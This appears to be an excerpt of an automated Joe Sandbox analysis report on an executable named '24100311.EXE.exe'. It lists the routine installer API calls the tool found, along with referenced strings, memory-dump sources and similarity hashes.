                                                  • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\24100311.EXE.exe",004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004067EC
                                                  • "C:\Users\user\Desktop\24100311.EXE.exe", xrefs: 004067EB
                                                  • *?|<>/":, xrefs: 0040683D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\24100311.EXE.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-435205726
                                                  • Opcode ID: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                                  • Instruction ID: fdbe35b52bffc5d77a346742aeba0a27372f18d7f8de2c65e324d6b3b11dfc69
                                                  • Opcode Fuzzy Hash: ad42b7741e5e7cf852433a5ca926bf711007504176ebaeb0857ba18f273580f2
                                                  • Instruction Fuzzy Hash: 8211932780261255DB303B559C44AB762E8AF94790B56C83FED8A732C0EB7C4C9286BD
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404516
                                                  • GetSysColor.USER32(00000000), ref: 00404554
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404560
                                                  • SetBkMode.GDI32(?,?), ref: 0040456C
                                                  • GetSysColor.USER32(?), ref: 0040457F
                                                  • SetBkColor.GDI32(?,?), ref: 0040458F
                                                  • DeleteObject.GDI32(?), ref: 004045A9
                                                  • CreateBrushIndirect.GDI32(?), ref: 004045B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                  • Instruction ID: b56a63bd10d9b88d704488fa4fc448251793e5de010e462820c933ca6d0d38e3
                                                  • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                  • Instruction Fuzzy Hash: F52167B1500B04AFCB31DF68DD48A577BF8AF41714B048A2EEA96A26E1D734D904CF58
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                    • Part of subcall function 00406113: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406129
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                                  • Instruction ID: 9e8848406421114bacb3fc7d7daa07285f06221c2759d1c737873bd090f70c65
                                                  • Opcode Fuzzy Hash: ab939e13b422882215719eb4d85b304d36e2795fa3dbfbe2acce84fdb36a63bb
                                                  • Instruction Fuzzy Hash: 5951F975D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402FE1
                                                  • GetTickCount.KERNEL32 ref: 00402FFF
                                                  • wsprintfW.USER32 ref: 0040302D
                                                    • Part of subcall function 004055A4: lstrlenW.KERNEL32(Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                                                    • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,Crenature,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                                                    • Part of subcall function 004055A4: lstrcatW.KERNEL32(Crenature,00403040,00403040,Crenature,00000000,00000000,00000000), ref: 004055FF
                                                    • Part of subcall function 004055A4: SetWindowTextW.USER32(Crenature,Crenature), ref: 00405611
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                                                    • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00403051
                                                  • ShowWindow.USER32(00000000,00000005), ref: 0040305F
                                                    • Part of subcall function 00402FAA: MulDiv.KERNEL32(000605C3,00000064,00063873), ref: 00402FBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: b05c67c46c87e700010054eae8e6e792e551e7c7e0ae3dcdbe65f70a63b6779b
                                                  • Instruction ID: a5f4734244b8f6f028ba4000c5489b7d2f6cf4b1dd98660c68856af7419d999b
                                                  • Opcode Fuzzy Hash: b05c67c46c87e700010054eae8e6e792e551e7c7e0ae3dcdbe65f70a63b6779b
                                                  • Instruction Fuzzy Hash: 1D010470506211EBCB216F64EE0CEAA7B7CAB00B01B10047BF841F11E9DABC4545DB9E
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E68
                                                  • GetMessagePos.USER32 ref: 00404E70
                                                  • ScreenToClient.USER32(?,?), ref: 00404E8A
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E9C
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction ID: 8ba846b23e886e731abba7044b613a2dc07349659d22c8c6246ceab34d3a3da9
                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction Fuzzy Hash: C0015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61C0D7B8AA058BA5
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E51
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Calibri
                                                  • API String ID: 3808545654-1409258342
                                                  • Opcode ID: 384baed0899809c381ca3df955ec9033b844118511c6fdbdf6c0601521adad6e
                                                  • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
                                                  • Opcode Fuzzy Hash: 384baed0899809c381ca3df955ec9033b844118511c6fdbdf6c0601521adad6e
                                                  • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                                  • GetLastError.KERNEL32 ref: 00405ACA
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
                                                  • GetLastError.KERNEL32 ref: 00405AE9
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
                                                  • C:\Users\user\Desktop, xrefs: 00405A73
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                  • API String ID: 3449924974-2028306314
                                                  • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                  • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
                                                  • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                  • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                  • wsprintfW.USER32 ref: 00402F7D
                                                  • SetWindowTextW.USER32(?,?), ref: 00402F8D
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402F9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                                  • Instruction ID: 618675c633d4cc4fa353176bd059bfe03840d53555a4d718e50652829a5d94b1
                                                  • Opcode Fuzzy Hash: 3624e717fbcf7ea6fd8cb3bfca044f62ca72f15282bbc00cb62a71a2cd90e3ed
                                                  • Instruction Fuzzy Hash: 4CF01D7050020EABDF206F60DE4ABEA3B78EB00349F00803AFA15A51D0DBBD9559DB59
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                  • GlobalFree.KERNEL32(?), ref: 004029F0
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 03a5a3f6320495704c05688f871147bbc72281edf72c00ac350c423d14e02ca6
                                                  • Instruction ID: 7dc8c05146b407601171e0863837a653734e4b001a2a5e69b47689ac9694c0d9
                                                  • Opcode Fuzzy Hash: 03a5a3f6320495704c05688f871147bbc72281edf72c00ac350c423d14e02ca6
                                                  • Instruction Fuzzy Hash: 3121C171C00124BBDF216FA5DE49D9E7E79AF04364F10023AF964762E1CB794D419BA8
                                                  APIs
                                                  • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                                  • wsprintfW.USER32 ref: 00404DE9
                                                  • SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1676796300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1676770960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676818375.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1676832252.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1677056612.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_24100311.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H7B
                                                  • API String ID: 3540041739-107966168
                                                  • Opcode ID: afb352a5ceb1d4586ea2fc8411844f54738b02514fb4fb2e587bb31c0291c273
                                                  • Instruction ID: 1eef4f6c404c38b42470a280790990b5f635bff36f5ff3debe150acb3f73a003
                                                  • Opcode Fuzzy Hash: afb352a5ceb1d4586ea2fc8411844f54738b02514fb4fb2e587bb31c0291c273
                                                  • Instruction Fuzzy Hash: 59110873A0412837DB0065ADAC45EDE32989F81374F250237FE26F20D5EA78CD1182E8
                                                  APIs
